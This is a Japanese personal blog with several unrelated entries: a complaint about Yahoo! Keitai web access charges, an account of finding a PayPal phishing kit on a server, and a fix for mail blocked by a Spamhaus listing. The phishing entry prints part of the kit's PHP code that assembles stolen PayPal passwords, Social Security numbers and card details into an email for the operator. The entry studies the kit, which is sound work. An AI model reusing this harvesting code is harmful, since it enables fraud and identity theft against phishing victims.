「Yahoo!ケータイ」トップページについてを見る限りでは、2009年2月1日(日)以降有料化になるらしい。
すなわち、利用プラン変更等、webからたどり、暗証番号をいれ、確認後電話でプラン変更を行うという作業についてもお金がかかるわけですか。
また、利用料金明細を見るだけでもお金がかかるようになるわけですか。最悪ですね…。
後者については、ネットで見れるのであまり関係は無さそうですが、うっかりとボタンを押してしまうことを考えるとひどいなあと思います。
パケ定額等一切付けてないので、まず、webをみようとすることが有りませんが、うっかり作業中に押してしまった、なにかに当たってボタンおされてしまったということが数ヶ月に1,2回程度有る。これを防ぐ手だては内のだろうか?
今後発売される機種には、ブラウザを起動したあと、表示しますか?といった確認が出るようになるのだろうか。
パケット割引等を付けている前提で考えないで欲しい。
とんでもないもの…見つけてしまいました。
いいのかい、これ(汗)
http://210.***.***.***/PayPal.tgz
そして、そのサーバにはフィッシングサイトが仕掛けられていました。
$ lv carcabot.php
---
$hostname = gethostbyaddr($ip);
$message = "-----------------+ PayPal USA Bank Spam Result +-----------------\n";
$message .= "Email address : $user\n";
$message .= "PayPal Password : $pass\n\n";
$message .= "Full Name : $fullname\n";
$message .= "Mother Maiden Name : $mmn\n";
$message .= "Date of Birth : $bday/$bmonth/$byear\n";
$message .= "Social Security No : $ssn1-$ssn2-$ssn3\n";
$message .= "Phone Number : $userphone";
$meesage = "$message$defaultmsg$secmsg$cc1msg$cc2msg$cc3msg$cc4msg";
$measage = $default + $sec + $cc1 + $cc2 + $cc3 + $cc4;
$rnessage = "$meesage\n";
$rnessage .= "---------------------------------------------------------\n";
$rnessage .= "Client IP : $ip\n";
$rnessage .= "HostName : $hostname\n";
$rnessage .= "Script : ".$_SERVER['SERVER_NAME'] . $_SERVER['SCRIPT_NAME']."\n";
$rnessage .= "-----------------+ Created in 2008 by CarcaBot+------------------\n";
$emailme="****@******"; // Write your mail here ← gmailが埋まってた
明らかに…。フィッシングの様です。
検証環境で実験してみたところ、フォームに入力後、PayPalの本物サイトへ飛ばされ誘導されるようになっており、POSTと同時に、指定されたメールアドレスにクレジットカードの番号や、PayPalのアカウント情報等がメールされました。クレジットカード番号は、適当に入力すると拒否され、正しいパターンに基づいて入力するチェックまで入っています。
送信メール内容は上記の感じです。
8月頃からメールが届かなくて何故だと調べていたが、メールのログで、value-domain.com で検索していたので見つからず。
まあいいやとおもい、放置していたのだが、ドメインの有効期限の通知メールやら届かないので調査してみた。(1コExpiresれてしまったので…。まだ、猶予期間だったため間に合った。)
で、過去のメールからメールヘッダを調査したところ、メールサーバは、sakura1.digi-rock.com[202.222.31.77]。すなわち、digi-rock.com で検索してればよかったようだ。
Nov 9 06:01:58 ns0 postfix/smtpd[23994]: NOQUEUE: reject: RCPT from sakura1.digi-rock.com[202.222.31.77]: 554 5.7.1 Service unavailable; Client host [202.222.31.77] blocked using zen.spamhaus.org; http://www.spamhaus.org/SBL/sbl.lasso?query=SBL67399; from=<root@sakura1.digi-rock.com> to=<***@example.com> proto=SMTP helo=<sakura1.digi-rock.com>
情報からわかることは、zen.spamhaus.org に登録されているぞ、ということ。情報を見たければ
URLを開けば詳細がわかる。
見てみたところ、次のように書いてある。
page carefully.
It contains the
reason for the
listing and who
to contact about it. Ref: SBL67399
202.222.31.77/32 is listed on the Spamhaus Block List (SBL)
27-Aug-2008 03:37 GMT | SR10
landing site for cell phone spammer.
Japanese language spam to cell phones sourced in the philipines
(SBL 67396) landing sites:
ぉぃぉぃ・・・。ケイタイへのスパムって(-_-;;;)
そういうわけで、届かないという状況の人は、zen.spamhaus.org を外すか、ホワイトリストを登録してください…。